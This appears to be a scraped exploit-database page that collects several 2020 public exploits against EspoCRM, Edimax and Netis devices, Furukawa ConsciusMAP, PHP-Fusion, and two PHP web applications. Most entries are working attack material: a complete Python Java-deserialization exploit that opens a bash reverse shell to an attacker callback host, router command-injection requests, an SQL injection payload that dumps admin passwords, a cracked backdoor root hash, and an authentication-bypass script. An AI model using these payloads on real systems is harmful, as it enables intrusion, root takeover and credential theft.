Listing Path ./root - Applications - bin - cores - developer - Library - private - sbin - System - usr - etc - var - tmp Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. -- VULNERABILITY LABORATORY - RESEARCH TEAM
-
EspoCRM 5.8.5 - Privilege Escalation
# Exploit Title: EspoCRM 5.8.5 - Privilege Escalation # Author: Besim ALTINOK # Vendor Homepage: https://www.espocrm.com # Software Link: https://www.espocrm.com/downloads/EspoCRM-5.8.5.zip # Version: v5.8.5 # Tested on: Xampp # Credit: İsmail BOZKURT ------------- Details: -------------------------------------------- 1- When we send a request to /api/v1/App/user, we can see the current user's details --- First Request: --------------------------- GET /api/v1/App/user HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 ************************* Authorization: Basic ************************************* Espo-Authorization: ************************************* Espo-Authorization-By-Token: true X-Requested-With: XMLHttpRequest DNT: 1 Connection: close Cookie: auth-token-secret=cdc7f7*********************377; auth-username=user1; auth-token=3a874a********************************48 ---- 2- When we decode the Basic Authorization and Espo-Authorization header values, replace the username with another user's (e.g. admin) and resend the first request, we can see that user's information and act with that user's level of access ---------- 3- Some examples of the encoding technique (Base64): First type: dXNlcjE6MQ== (user1:1) Second type: user1:MzNmYzYwZDQ1ZDI2YWNhODYxZTZlYjdiMDgwMjk4TkRn (user1:pass)
-
Edimax EW-7438RPn 1.13 - Remote Code Execution
# Exploit Title: Edimax EW-7438RPn 1.13 - Remote Code Execution # Date: 2020-04-23 # Exploit Author: Besim ALTINOK # Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/ # Version:1.13 # Tested on: Edimax EW-7438RPn 1.13 Version ------ NOTE: This device configurated with root permissions. So you can run the command as root Here is the detail(s) of the RCE(s) 1- Content of the mp.asp file <form action="/goform/mp" method="POST" name="mp"> <input type="text" name="command" value=""> <input type="submit" value="GO"> <input type="hidden" name="getID" value=""> <input type="hidden" name="getID" value=""> </form> RCE Detail: ------------------------------- POST /goform/mp HTTP/1.1 Host: 192.168.2.2 User-Agent: Mozilla/5.0 ********************* Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 25 DNT: 1 Authorization: Basic YWRtaW46MTIzNA== Connection: close Cookie: language=1 Upgrade-Insecure-Requests: 1 command=||busybox+ls&getID= ------------------------------- 2- Content of the syscmd.asp <form action=/goform/formSysCmd method=POST name="formSysCmd"><table border=0 width="500" cellspacing=0 cellpadding=0> <tr><font size=2> This page can be used to run target system command.</tr> <tr><hr size=1 noshade align=top></tr> <tr> <td>System Command: </td> <td><input type="text" name="sysCmd" value="" size="20" maxlength="50"></td> <td> <input type="submit" value="Apply" name="apply" onClick='return saveClick()'></td></form> RCE Detail: ------------------------------- POST /goform/formSysCmd HTTP/1.1 Host: 192.168.2.2 User-Agent: Mozilla/5.0 ********************* Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded 
Content-Length: 11 DNT: 1 Authorization: Basic YWRtaW46MTIzNA== Connection: close Cookie: language=1 Upgrade-Insecure-Requests: 1 sysCmd="command to here"
-
Popcorn Time 6.2 - 'Update service' Unquoted Service Path
# Exploit Title: Popcorn Time 6.2 - 'Update service' Unquoted Service Path # Date: 2020-04-24 # Vendor Homepage: https://getpopcorntime.is # Exploit Authors: Uriel Yochpaz & Jonatan Schor # Software Link: https://dl.getpopcorntime.is/PopcornTime-latest.exe # Version: 6.2.1.14 and probably prior versions # Tested on: Windows 10, 7 # CVE : N/A [+] Description: Popcorn Time For Windows installs as a service with an unquoted service path running with SYSTEM privileges. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. [+] POC: C:\Users\User>sc qc "Update service" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Update service TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Popcorn Time\Updater.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Update service DEPENDENCIES : SERVICE_START_NAME : LocalSystem [+] Exploit: A successful attempt would require the local user to be able to insert their code in "Program files (x86)" (popcorn.exe) or "C:\" (program.exe) folders undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
-
Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution
# Exploit Title: Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution # Date: 2020-04-24 # Vendor Homepage: https://www.tecnoredsa.com.ar # Exploit Authors: LiquidWorm # Software Link: https://dl.getpopcorntime.is/PopcornTime-latest.exe # Version: 2.8.1 # CVE : N/A #!/usr/bin/env python3 # -*- coding: utf-8 -*- # # # Furukawa Electric ConsciusMAP 2.8.1 Java Deserialization Remote Code Execution # # # Vendor: Furukawa Electric Co., Ltd. | Tecnored SA # Product web page: https://www.furukawa.co.jp | https://www.tecnoredsa.com.ar # Affected version: APROS Evolution | 2.8.1 # FURUKAWA | 2.7.10 # ConsciusMAP | 2.6.4 # | 2.3.1 # | 2.1.49 # | 2.1.36 # | 2.1.31 # | 2.1.18 # | 2.1.16 # | 2.1.15 # | 2.1.1 # | 2.0.1174 # | 1.8 # | 1.4.70 # # Summary: Apros Evoluation / Furukawa / ConsciusMap is the Tecnored # provisioning system for FTTH networks. Complete administration of # your entire external FTTH network plant, including from the ONUs # installed in each end customer, to the wiring and junction boxes. # Unify all the management of your FTTH network on a single platform. # Unify all your data, whether from customers, your network, or the # external plant in one place. APROS FTTH allows you to manage your # entire FTTH network in a simple and globalized way with just one # click, without being a network expert. Includes services such as: # bandwidth limitation, Turbo Internet for time plans, BURST Internet, # QinQ for companies, and many more. General consumption graphics and # per customer in real time. Captive Portal for cutting or suspension # of the service. # # Desc: The FTTH provisioning solution suffers from an unauthenticated # remote code execution vulnerability due to an unsafe deserialization # of Java objects (ViewState) triggered via the 'javax.faces.ViewState' # HTTP POST parameter. 
The deserialization can cause the vulnerable JSF # web application to execute arbitrary Java functions, malicious Java # bytecode, and system shell commands with root privileges. # # =================================================================== # $ ./furukawa.py 172.16.0.1:8080 172.168.0.200 4444 # [*] Setting up valid URL path # [*] Starting callback listener child thread # [*] Starting handler on port 4444 # [*] Sending serialized object # [*] Connection from 172.16.0.1:48446 # [*] You got shell! # tomcat7@zslab:/var/lib/tomcat7$ id # uid=114(tomcat7) gid=124(tomcat7) grupos=124(tomcat7),1003(furukawa) # tomcat7@zslab:/var/lib/tomcat7$ sudo su # id # uid=0(root) gid=0(root) grupos=0(root) # exit # tomcat7@zslab:/var/lib/tomcat7$ exit # *** Connection closed by remote host *** # =================================================================== # # Tested on: Apache Tomcat/7.0.68 # Apache Tomcat/7.0.52 # Apache MyFaces/2.2.1 # Apache MyFaces/2.1.17 # Apache MyFaces/2.0.10 # GNU/Linux 4.4.0-173 # GNU/Linux 4.4.0-137 # GNU/Linux 4.4.0-101 # GNU/Linux 4.4.0-83 # GNU/Linux 3.15.0 # GNU/Linux 3.13.0-32 # PrimeFaces/4.0.RC1 # Apache-Coyote/1.1 # ACC Library 3.1 # Ubuntu 16.04.2 # Ubuntu 14.04.2 # Java/1.8.0_242 # Java/1.8.0_181 # Java/1.8.0_131 # Java/1.7.0_79 # MySQL 5.7.29 # MySQL 5.7.18 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # Macedonian Information Security Research and Development Laboratory # Zero Science Lab - https://www.zeroscience.mk - @zeroscience # # # Advisory ID: ZSL-2020-5565 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5565.php # # CVE ID: CVE-2020-12133 # CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-12133 # # # 24.02.2020 # import os############# import sys############ import gzip#######o### import zlib########### import socket######### import base64######### import urllib######### import requests####### import telnetlib###### import threading###### import subprocess##### from io 
import BytesIO from time import sleep from flash import blic class Optics: def __init__(self): self.callback = None# self.headers = None## self.payload = None## self.target = None### self.lport = None#### self.path = None##### self.cmd = None###### def allears(self): telnetus = telnetlib.Telnet() print("[*] Starting handler on port {}".format(self.lport)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("0.0.0.0", self.lport)) while True: try: s.settimeout(8) s.listen(1) conn, addr = s.accept() print("[*] Connection from {}:{}".format(addr[0], addr[1])) telnetus.sock = conn except socket.timeout as p: print("[!] Probably not vulnerable... ({poraka})".format(poraka=p)) print("[+] Check your port mappings.") s.close() exit(0) break print("[*] You got shell!") # # UnicodeDecodeError dirty fix: # /usr/lib/python3.6/telnetlib.py # Change from 'ascii' to 'utf-8' (Lines: 553 and 556) # telnetus.interact() conn.close() def thricer(self): print("[*] Starting callback listener child thread") konac = threading.Thread(name="ZSL", target=self.allears) konac.start() sleep(1) self.gadget() def gadget(self): self.cmd = "/bin/bash -c /bin/bash${IFS}-i>&/dev/tcp/" self.cmd += self.callback self.cmd += "/" self.cmd += str(self.lport) self.cmd += "<&1" payload = b"\xAC\xED\x00\x05\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C" payload += b"\x2E\x48\x61\x73\x68\x53\x65\x74\xBA\x44\x85\x95\x96\xB8\xB7\x34\x03" payload += b"\x00\x00\x78\x70\x77\x0C\x00\x00\x00\x02\x3F\x40\x00\x00\x00\x00\x00" payload += b"\x01\x73\x72\x00\x34\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63" payload += b"\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E" payload += b"\x73\x2E\x6B\x65\x79\x76\x61\x6C\x75\x65\x2E\x54\x69\x65\x64\x4D\x61" payload += b"\x70\x45\x6E\x74\x72\x79\x8A\xAD\xD2\x9B\x39\xC1\x1F\xDB\x02\x00\x02" payload += b"\x4C\x00\x03\x6B\x65\x79\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61" payload += 
b"\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x4C\x00\x03\x6D\x61\x70\x74" payload += b"\x00\x0F\x4C\x6A\x61\x76\x61\x2F\x75\x74\x69\x6C\x2F\x4D\x61\x70\x3B" payload += b"\x78\x70\x74\x00\x26\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x69\x74\x68" payload += b"\x75\x62\x2E\x63\x6F\x6D\x2F\x6A\x6F\x61\x6F\x6D\x61\x74\x6F\x73\x66" payload += b"\x2F\x6A\x65\x78\x62\x6F\x73\x73\x20\x73\x72\x00\x2A\x6F\x72\x67\x2E" payload += b"\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F" payload += b"\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x6D\x61\x70\x2E\x4C\x61\x7A" payload += b"\x79\x4D\x61\x70\x6E\xE5\x94\x82\x9E\x79\x10\x94\x03\x00\x01\x4C\x00" payload += b"\x07\x66\x61\x63\x74\x6F\x72\x79\x74\x00\x2C\x4C\x6F\x72\x67\x2F\x61" payload += b"\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F\x63\x6F\x6C" payload += b"\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72" payload += b"\x6D\x65\x72\x3B\x78\x70\x73\x72\x00\x3A\x6F\x72\x67\x2E\x61\x70\x61" payload += b"\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65" payload += b"\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E\x43" payload += b"\x68\x61\x69\x6E\x65\x64\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72" payload += b"\x30\xC7\x97\xEC\x28\x7A\x97\x04\x02\x00\x01\x5B\x00\x0D\x69\x54\x72" payload += b"\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x73\x74\x00\x2D\x5B\x4C\x6F\x72" payload += b"\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F" payload += b"\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73" payload += b"\x66\x6F\x72\x6D\x65\x72\x3B\x78\x70\x75\x72\x00\x2D\x5B\x4C\x6F\x72" payload += b"\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E" payload += b"\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x54\x72\x61\x6E\x73" payload += b"\x66\x6F\x72\x6D\x65\x72\x3B\xBD\x56\x2A\xF1\xD8\x34\x18\x99\x02\x00" payload += b"\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3B\x6F\x72\x67\x2E\x61\x70" payload += 
b"\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C" payload += b"\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E" payload += b"\x43\x6F\x6E\x73\x74\x61\x6E\x74\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D" payload += b"\x65\x72\x58\x76\x90\x11\x41\x02\xB1\x94\x02\x00\x01\x4C\x00\x09\x69" payload += b"\x43\x6F\x6E\x73\x74\x61\x6E\x74\x71\x00\x7E\x00\x03\x78\x70\x76\x72" payload += b"\x00\x11\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x52\x75\x6E\x74\x69" payload += b"\x6D\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72" payload += b"\x00\x3A\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D" payload += b"\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66" payload += b"\x75\x6E\x63\x74\x6F\x72\x73\x2E\x49\x6E\x76\x6F\x6B\x65\x72\x54\x72" payload += b"\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x87\xE8\xFF\x6B\x7B\x7C\xCE\x38" payload += b"\x02\x00\x03\x5B\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5B\x4C\x6A" payload += b"\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x4C" payload += b"\x00\x0B\x69\x4D\x65\x74\x68\x6F\x64\x4E\x61\x6D\x65\x74\x00\x12\x4C" payload += b"\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B" payload += b"\x5B\x00\x0B\x69\x50\x61\x72\x61\x6D\x54\x79\x70\x65\x73\x74\x00\x12" payload += b"\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73" payload += b"\x3B\x78\x70\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E" payload += b"\x67\x2E\x4F\x62\x6A\x65\x63\x74\x3B\x90\xCE\x58\x9F\x10\x73\x29\x6C" payload += b"\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0A\x67\x65\x74\x52\x75" payload += b"\x6E\x74\x69\x6D\x65\x75\x72\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2E\x6C" payload += b"\x61\x6E\x67\x2E\x43\x6C\x61\x73\x73\x3B\xAB\x16\xD7\xAE\xCB\xCD\x5A" payload += b"\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4D" payload += b"\x65\x74\x68\x6F\x64\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x02\x76\x72" payload += 
b"\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E" payload += b"\x67\xA0\xF0\xA4\x38\x7A\x3B\xB3\x42\x02\x00\x00\x78\x70\x76\x71\x00" payload += b"\x7E\x00\x1B\x73\x71\x00\x7E\x00\x13\x75\x71\x00\x7E\x00\x18\x00\x00" payload += b"\x00\x02\x70\x75\x71\x00\x7E\x00\x18\x00\x00\x00\x00\x74\x00\x06\x69" payload += b"\x6E\x76\x6F\x6B\x65\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x02\x76\x72" payload += b"\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x62\x6A\x65\x63" payload += b"\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00" payload += b"\x7E\x00\x18\x73\x71\x00\x7E\x00\x13\x75\x72\x00\x13\x5B\x4C\x6A\x61" payload += b"\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E\x67\x3B\xAD\xD2" payload += b"\x56\xE7\xE9\x1D\x7B\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00" payload += (bytes(chr(len(self.cmd)), "utf-8"))##################################" payload += (bytes(self.cmd, "utf-8"))############################################" payload += b"\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x01" payload += b"\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x0F\x73\x72\x00\x11\x6A\x61" payload += b"\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x49\x6E\x74\x65\x67\x65\x72\x12\xE2" payload += b"\xA0\xA4\xF7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6C\x75\x65" payload += b"\x78\x72\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4E\x75\x6D" payload += b"\x62\x65\x72\x86\xAC\x95\x1D\x0B\x94\xE0\x8B\x02\x00\x00\x78\x70\x00" payload += b"\x00\x00\x01\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E" payload += b"\x48\x61\x73\x68\x4D\x61\x70\x05\x07\xDA\xC1\xC3\x16\x60\xD1\x03\x00" payload += b"\x02\x46\x00\x0A\x6C\x6F\x61\x64\x46\x61\x63\x74\x6F\x72\x49\x00\x09" payload += b"\x74\x68\x72\x65\x73\x68\x6F\x6C\x64\x78\x70\x3F\x40\x00\x00\x00\x00" payload += b"\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x78"#######" jbits = BytesIO() with gzip.GzipFile(fileobj=jbits, mode="wb") as f: f.write(payload) serialize = 
base64.b64encode(jbits.getvalue()) print("[*] Sending serialized object") self.headers = { "Accept" : "text/html,application/xhtml+xml,application/xml;q=1.pwn", "Content-Type" : "application/x-www-form-urlencoded", "User-Agent" : "ISP-Eye/2.51", "Connection" : "keep-alive"} self.paramz={"javax.faces.ViewState" : serialize} #sleep(1) r = requests.post(self.target + self.path, headers=self.headers, data=self.paramz) def par(self): if len(sys.argv) != 4: self.usage() else: self.target = sys.argv[1] self.callback = sys.argv[2] self.lport = int(sys.argv[3]) if not "http" in self.target: self.target = "http://{}".format(self.target) def check(self): print("[*] Setting up valid URL path") try: r = requests.get(self.target) app = r.text if not "FURUKAWA" in app and not "APROS" in app: print("[!] App not detected.") exit(0) if "FURUKAWA" in app: self.path = "/FURUKAWA/" elif "APROS" in app: self.path = "/APROS/" else: exit(-1337) except Exception as p: print("[!] Somethingz wrong: \n--\n{poraka}".format(poraka=p)) exit(0) def framed(self): naslov = """ o===--------------------------------------===o | | | Furukawa Electric / Tecnored | | APROS Evolution | FURUKAWA | ConsciusMAP | | Fiber-To-The-Home (FTTH) | | | | Java Deserialization Remote Code Execution | | ZSL-2020-5565 | | | o===--------------------------------------===o || || (\__/)|| (•ㅅ•)|| / づ| """ print(naslov) def usage(self): self.framed() print("Usage: ./furukawa.py <RHOST[:RPORT]> <LHOST> <LPORT>") print("Example: ./furukawa.py 172.16.0.1:8080 172.16.0.200 4444\n") exit(0) def main(self): self.par()########() self.check()######() self.thricer()####() if __name__ == '__main__': Optics().main()
-
PHP-Fusion 9.03.50 - 'Edit Profile' Arbitrary File Upload
# Exploit Title: PHP-Fusion 9.03.50 - 'Edit Profile' Arbitrary File Upload # Date: 2020-04-24 # Author: Besim ALTINOK # Vendor Homepage: https://www.php-fusion.co.uk/home.php # Software Link: https://sourceforge.net/projects/php-fusion/files/PHP-Fusion%20Archives/9.x/PHP-Fusion%209.03.50.zip/download # Version: v9.03.50 # Tested on: Xampp # Credit: İsmail BOZKURT and AkkuS ------------------------------------------------------------------------------------------------- Description --- - The application does not check the file extension when a user uploads an avatar photo, so a PHP file can be uploaded instead, for example: Content of the file -- Sample PHP code: <? phpinfo(); ?> Name of the file: --- Sample PHP file name: tester.php - When uploading the avatar image, simply change the file name and content as above. ---------------------------------------------------------------------------------------- Vulnerable code section in UserFieldsInput.inc ---------------------------------------------------------- private function _setUserAvatar() { if (isset($_POST['delAvatar'])) { if ($this->userData['user_avatar'] != "" && file_exists(IMAGES."avatars/".$this->userData['user_avatar']) && is_file(IMAGES."avatars/".$this->userData['user_avatar'])) { unlink(IMAGES."avatars/".$this->userData['user_avatar']); } $this->data['user_avatar'] = ''; } if (isset($_FILES['user_avatar']) && $_FILES['user_avatar']['name']) { // uploaded avatar if (!empty($_FILES['user_avatar']) && is_uploaded_file($_FILES['user_avatar']['tmp_name'])) { $upload = form_sanitizer($_FILES['user_avatar'], '', 'user_avatar'); if (isset($upload['error']) && !$upload['error']) { // ^ maybe use empty($upload['error']) also can but maybe low end php version has problem on empty. $this->data['user_avatar'] = $upload['image_name']; } } } }
-
Netis E1+ 1.2.32533 - Backdoor Account (root)
# Exploit Title: Netis E1+ 1.2.32533 - Backdoor Account (root) # Date: 2020-04-25 # Author: Besim ALTINOK # Vendor Homepage: http://www.netis-systems.com # Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/204 # Version: V1.2.32533 # Tested on: Netis E1+ V1.2.32533 # Credit: İsmail BOZKURT ----------------------------- *root:abSQTPcIskFGc:0:0:root:/:/bin/sh* Created directory: /home/pentestertraining/.john Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 SSE2-16]) Press 'q' or Ctrl-C to abort, almost any other key for status Warning: MaxLen = 13 is too large for the current hash type, reduced to 8*realtek (root)* 1g 0:00:00:28 3/3 0.03533g/s 1584Kp/s 1584Kc/s 1584KC/s realka2..reasll5 Use the "--show" option to display all of the cracked passwords reliably Session completed
-
Online shopping system advanced 1.0 - 'p' SQL Injection
# Exploit Title: Online shopping system advanced 1.0 - 'p' SQL Injection # Exploit Author : Majid kalantari # Date: 2020-04-26 # Vendor Homepage : https://github.com/PuneethReddyHC/online-shopping-system-advanced # Software link: https://github.com/PuneethReddyHC/online-shopping-system-advanced/archive/master.zip # Version: - # Tested on: Windows 10 # CVE: N/A =============================================== # vulnerable file: product.php # vulnerable parameter : p # payload : http://127.0.0.1:8081/phps/product.php?p=-10+union+select+1,2,3,concat(admin_email,%27----%27,admin_password),5,6,7,8+from+admin_info%23# ! #Description: the $product_id value is read directly from $_GET['p'] and interpolated into the SQL statement without sanitization or parameterization. Line 46: $product_id = $_GET['p']; $sql = " SELECT * FROM products "; $sql = " SELECT * FROM products WHERE product_id = $product_id"; ===============================================
-
Netis E1+ V1.2.32533 - Unauthenticated WiFi Password Leak
# Exploit Title: Netis E1+ 1.2.32533 - Unauthenticated WiFi Password Leak # Date: 2020-04-25 # Author: Besim ALTINOK # Vendor Homepage: http://www.netis-systems.com # Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/204 # Version: V1.2.32533 # Tested on: Netis E1+ V1.2.32533 # Credit: İsmail BOZKURT ----------------------------- HTTP Request ------------------------------------------- GET //netcore_get.cgi HTTP/1.1 Host: netisext.cc User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: homeFirstShow=yes Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Detail of the HTTP Response: ------------------------------------------- hange_name':'[ ]','ddns_domain':'','ddns_info':'[ ]','time_now':'01/14/2015 09:58:51','timezone':'-8 1','time_type':'1','daylight_save':'1','time_server':'65.55.56.206','time_date':'2015','time_date2':'1','time_date3':'14','time_time':'9','time_time2':'58','time_time3':'51','old_user':'','def_pwd_flag':'1','old_pwd':'','wakeup_mac':'00:00:00:00:00:00','rp_config_status':'35','rp_client_status':'3','rp_ap_ssid':'ExampleSSID','rp_ap_password':'WiFiPass123','rp_ap_users':'1','rp_client_ssid':'TestSSID','rp_client_bssid':'98:e7:f5:ab:95:ad','rp_client_password':'WiFiPass123','rp_client_time':'357','rp_client_signals':'65','rp_client_speeds':'117','rp_roaming_onoff':'16','rp_soon_ssid':'TestSSID','rp_soon_password':'WiFiPass123','rr_current_mode':'1','rp_diagnose_status':'0',"statistics_list":[{'type':'LAN','tx_pack':'0','rx_pack':'0','t
-
Online Course Registration 2.0 - Authentication Bypass
# Exploit Title: Online Course Registration 2.0 - Authentication Bypass # Google Dork: N/A # Date: 2020-04-25 # Exploit Author: Daniel Monzón (stark0de) # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/online-course-registration-free-download/ # Version: 2.0 # Tested on: Kali Linux x64 5.4.0 # CVE : N/A #There are multiple SQL injection vulnerabilities in Online Course Registration #PHP script: #./check_availability.php: $result =mysqli_query($con,"SELECT studentRegno FROM courseenrolls WHERE course='$cid' and studentRegno=' $regid'"); #./check_availability.php: $result =mysqli_query($con,"SELECT * FROM courseenrolls WHERE course='$cid'"); #./check_availability.php: $result1 =mysqli_query($con,"SELECT noofSeats FROM course WHERE id='$cid'"); #./change-password.php:$sql=mysqli_query($con,"SELECT password FROM students where password='".md5($_POST['cpass'])."' && studentRegno='".$_SESSION['login']."'"); #./admin/check_availability.php: $result =mysqli_query($con,"SELECT StudentRegno FROM students WHERE StudentRegno='$regno'"); #./admin/change-password.php:$sql=mysqli_query($con,"SELECT password FROM admin where password='".md5($_POST['cpass'])."' && username='".$_SESSION['alogin']."'"); #./admin/index.php:$query=mysqli_query($con,"SELECT * FROM admin WHERE username='$username' and password='$password'"); #./index.php:$query=mysqli_query($con,"SELECT * FROM students WHERE StudentRegno='$regno' and password='$password'"); #./includes/header.php: $ret=mysqli_query($con,"SELECT * from userlog where studentRegno='".$_SESSION['login']."' order by id desc limit 1,1"); #./pincode-verification.php:$sql=mysqli_query($con,"SELECT * FROM students where pincode='".trim($_POST['pincode'])."' && StudentRegno='".$_SESSION['login']."'"); #It is also possible to bypass the authentication in the two login pages: #!/usr/bin/python3 try: from termcolor import colored from colorama import init import argparse import requests except: print("Please run pip3 
install termcolor,colorama,argparse,requests") init() symbol_green=colored("[+]", 'green') symbol_red=colored("[-]", 'red') parser = argparse.ArgumentParser() parser.add_argument('url', help='The URL of the target.') args = parser.parse_args() adminurl = args.url + '/onlinecourse/admin/' def main(): initial='Online Course Registration Authentication Bypass in %s' % ( args.url ) + "\n" print(colored(initial, 'yellow')) sess = requests.session() data_login = { 'username': "admin' or 1=1 -- ", 'password': 'whatever', 'submit': '' } try: req = sess.post(adminurl, data=data_login, verify=False, allow_redirects=True) resp_code = req.status_code except: print(symbol_red+" The request didn't work!\n") exit() if resp_code == 200 and "document.chngpwd.cpass.value" in req.text: print(symbol_green+" Authentication bypassed for admin user!\n") print(symbol_green+" To test this manually, visit: " + adminurl+ " and enter: admin' or 1=1 -- in the username field and whatever in password field, then click the Log Me In button\n") else: print(symbol_red+" Fail!") main()